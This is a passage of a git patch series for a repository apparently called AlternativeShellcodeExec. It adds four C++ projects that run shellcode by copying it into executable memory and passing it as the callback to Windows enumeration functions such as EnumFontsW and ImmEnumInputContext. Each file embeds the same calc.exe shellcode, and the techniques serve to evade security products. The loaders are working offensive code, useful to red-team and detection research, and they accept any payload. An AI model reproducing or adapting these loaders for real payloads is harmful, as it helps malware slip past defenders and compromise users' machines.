2001 From: S4R1N Date: Mon, 12 Apr 2021 20:46:13 -0400 Subject: [PATCH 17/28] EnumResourceTypesExW added --- AlternativeShellcodeExec.sln | 10 ++ EnumResourceTypesExW/EnumResourceTypesExW.cpp | 43 +++++ .../EnumResourceTypesExW.vcxproj | 147 ++++++++++++++++++ .../EnumResourceTypesExW.vcxproj.filters | 22 +++ 4 files changed, 222 insertions(+) create mode 100644 EnumResourceTypesExW/EnumResourceTypesExW.cpp create mode 100644 EnumResourceTypesExW/EnumResourceTypesExW.vcxproj create mode 100644 EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 97e9afc..8d640bd 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -69,6 +69,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumSystemLocales", "EnumSy EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPwrSchemes", "EnumPwrSchemes\EnumPwrSchemes.vcxproj", "{13291D07-600D-44D2-91F8-A1FEF83AB0FD}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumResourceTypesExW", "EnumResourceTypesExW\EnumResourceTypesExW.vcxproj", "{D0AB9F7D-C35D-4E4F-840A-34597B466E1A}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -341,6 +343,14 @@ Global {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x64.Build.0 = Release|x64 {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.ActiveCfg = Release|Win32 {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.Build.0 = Release|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x64.ActiveCfg = Debug|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x64.Build.0 = Debug|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x86.ActiveCfg = Debug|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x86.Build.0 = Debug|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x64.ActiveCfg = Release|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x64.Build.0 = Release|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.ActiveCfg = Release|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumResourceTypesExW/EnumResourceTypesExW.cpp b/EnumResourceTypesExW/EnumResourceTypesExW.cpp new file mode 100644 index 0000000..c15eb3c --- /dev/null +++ b/EnumResourceTypesExW/EnumResourceTypesExW.cpp @@ -0,0 +1,43 @@ +#include +#include +#include +#include + +#pragma comment(lib, "KtmW32.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + EnumResourceTypesExW(::LoadLibraryW(L"Kernel32.dll"), (ENUMRESTYPEPROCW)address, NULL, RESOURCE_ENUM_VALIDATE, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj new file mode 100644 index 0000000..fd0936a --- /dev/null +++ b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {d0ab9f7d-c35d-4e4f-840a-34597b466e1a} + EnumResourceTypesExW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters new file mode 100644 index 0000000..cd5df53 --- /dev/null +++ b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From bc26da74db6f0e177d11325602b86d50dab089fe Mon Sep 17 00:00:00 2001 From: S4R1N Date: Thu, 15 Apr 2021 21:55:39 -0400 Subject: [PATCH 18/28] k --- AlternativeShellcodeExec.sln | 10 ++ ImmEnumInputContext/ImmEnumInputContext.cpp | 42 +++++ .../ImmEnumInputContext.vcxproj | 147 ++++++++++++++++++ .../ImmEnumInputContext.vcxproj.filters | 22 +++ 4 files changed, 221 insertions(+) create mode 100644 ImmEnumInputContext/ImmEnumInputContext.cpp create mode 100644 ImmEnumInputContext/ImmEnumInputContext.vcxproj create mode 100644 ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 8d640bd..51f2ec4 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -71,6 +71,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPwrSchemes", "EnumPwrSc EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumResourceTypesExW", "EnumResourceTypesExW\EnumResourceTypesExW.vcxproj", "{D0AB9F7D-C35D-4E4F-840A-34597B466E1A}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImmEnumInputContext", "ImmEnumInputContext\ImmEnumInputContext.vcxproj", "{13C7FED8-77A0-4EE3-A431-6E77F22320C3}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -351,6 +353,14 @@ Global {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x64.Build.0 = Release|x64 {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.ActiveCfg = Release|Win32 {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.Build.0 = Release|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x64.ActiveCfg = Debug|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x64.Build.0 = Debug|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x86.ActiveCfg = Debug|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x86.Build.0 = Debug|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x64.ActiveCfg = Release|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x64.Build.0 = Release|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.ActiveCfg = Release|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/ImmEnumInputContext/ImmEnumInputContext.cpp b/ImmEnumInputContext/ImmEnumInputContext.cpp new file mode 100644 index 0000000..86410c2 --- /dev/null +++ b/ImmEnumInputContext/ImmEnumInputContext.cpp @@ -0,0 +1,42 @@ +#include +#include +#include + +#pragma comment(lib, "Imm32.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + ::ImmEnumInputContext(NULL, (IMCENUMPROC)address, NULL); + + return 0; + +} \ No newline at end of file diff --git a/ImmEnumInputContext/ImmEnumInputContext.vcxproj b/ImmEnumInputContext/ImmEnumInputContext.vcxproj new file mode 100644 index 0000000..16740ef --- /dev/null +++ b/ImmEnumInputContext/ImmEnumInputContext.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {13c7fed8-77a0-4ee3-a431-6e77f22320c3} + ImmEnumInputContext + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters b/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters new file mode 100644 index 0000000..3284a4f --- /dev/null +++ b/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From dd68d8fc9f2c03e7dec7515e863751cfffbdcfe6 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Wed, 28 Apr 2021 21:19:43 -0400 Subject: [PATCH 19/28] EnumFontsW --- AlternativeShellcodeExec.sln | 10 ++ EnumFontsW/EnumFontsW.cpp | 41 +++++++ EnumFontsW/EnumFontsW.vcxproj | 147 ++++++++++++++++++++++++++ EnumFontsW/EnumFontsW.vcxproj.filters | 22 ++++ 4 files changed, 220 insertions(+) create mode 100644 EnumFontsW/EnumFontsW.cpp create mode 100644 EnumFontsW/EnumFontsW.vcxproj create mode 100644 EnumFontsW/EnumFontsW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 51f2ec4..9370be3 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -73,6 +73,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumResourceTypesExW", "Enu EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImmEnumInputContext", "ImmEnumInputContext\ImmEnumInputContext.vcxproj", "{13C7FED8-77A0-4EE3-A431-6E77F22320C3}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontsW", "EnumFontsW\EnumFontsW.vcxproj", "{0091D5E9-A212-4C34-857F-0DB13D272AA2}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -361,6 +363,14 @@ Global {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x64.Build.0 = Release|x64 {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.ActiveCfg = Release|Win32 {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.Build.0 = Release|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x64.ActiveCfg = Debug|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x64.Build.0 = Debug|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x86.ActiveCfg = Debug|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x86.Build.0 = Debug|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x64.ActiveCfg = Release|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x64.Build.0 = Release|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.ActiveCfg = Release|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumFontsW/EnumFontsW.cpp b/EnumFontsW/EnumFontsW.cpp new file mode 100644 index 0000000..b8da1e1 --- /dev/null +++ b/EnumFontsW/EnumFontsW.cpp @@ -0,0 +1,41 @@ +#include + + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + HDC dc = GetDC(NULL); + EnumFontsW(dc, NULL, (FONTENUMPROCW)address, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumFontsW/EnumFontsW.vcxproj b/EnumFontsW/EnumFontsW.vcxproj new file mode 100644 index 0000000..741df83 --- /dev/null +++ b/EnumFontsW/EnumFontsW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {0091d5e9-a212-4c34-857f-0db13d272aa2} + EnumFontsW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumFontsW/EnumFontsW.vcxproj.filters b/EnumFontsW/EnumFontsW.vcxproj.filters new file mode 100644 index 0000000..ce73f66 --- /dev/null +++ b/EnumFontsW/EnumFontsW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 60a168387795be9b4d5a90de40ee132cc6e9e669 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Fri, 30 Apr 2021 19:33:06 -0400 Subject: [PATCH 20/28] Going to be adding a few from WinGDI.h in the next couple of days.... its a gold mine --- AlternativeShellcodeExec.sln | 10 ++ EnumFontFamiliesW/EnumFontFamiliesW.cpp | 41 +++++ EnumFontFamiliesW/EnumFontFamiliesW.vcxproj | 147 ++++++++++++++++++ .../EnumFontFamiliesW.vcxproj.filters | 22 +++ 4 files changed, 220 insertions(+) create mode 100644 EnumFontFamiliesW/EnumFontFamiliesW.cpp create mode 100644 EnumFontFamiliesW/EnumFontFamiliesW.vcxproj create mode 100644 EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 9370be3..c0e72e7 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -75,6 +75,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImmEnumInputContext", "ImmE EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontsW", "EnumFontsW\EnumFontsW.vcxproj", "{0091D5E9-A212-4C34-857F-0DB13D272AA2}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesW", "EnumFontFamiliesW\EnumFontFamiliesW.vcxproj", "{383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -371,6 +373,14 @@ Global {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x64.Build.0 = Release|x64 {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.ActiveCfg = Release|Win32 {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.Build.0 = Release|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x64.ActiveCfg = Debug|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x64.Build.0 = Debug|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x86.ActiveCfg = Debug|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Debug|x86.Build.0 = Debug|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x64.ActiveCfg = Release|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x64.Build.0 = Release|x64 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.ActiveCfg = Release|Win32 + {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumFontFamiliesW/EnumFontFamiliesW.cpp b/EnumFontFamiliesW/EnumFontFamiliesW.cpp new file mode 100644 index 0000000..5d8cf23 --- /dev/null +++ b/EnumFontFamiliesW/EnumFontFamiliesW.cpp @@ -0,0 +1,41 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + HDC dc = GetDC(NULL); + EnumFontFamiliesW(dc, NULL, (FONTENUMPROCW)address, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj new file mode 100644 index 0000000..491cbe0 --- /dev/null +++ b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {383ab5c3-dda6-49aa-b3ac-4f8a63cc7460} + EnumFontFamiliesW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters new file mode 100644 index 0000000..856fbee --- /dev/null +++ b/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 106bddc09ff9ce31d5e6d890580563f9bd8de554 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sat, 1 May 2021 16:31:16 -0400 Subject: 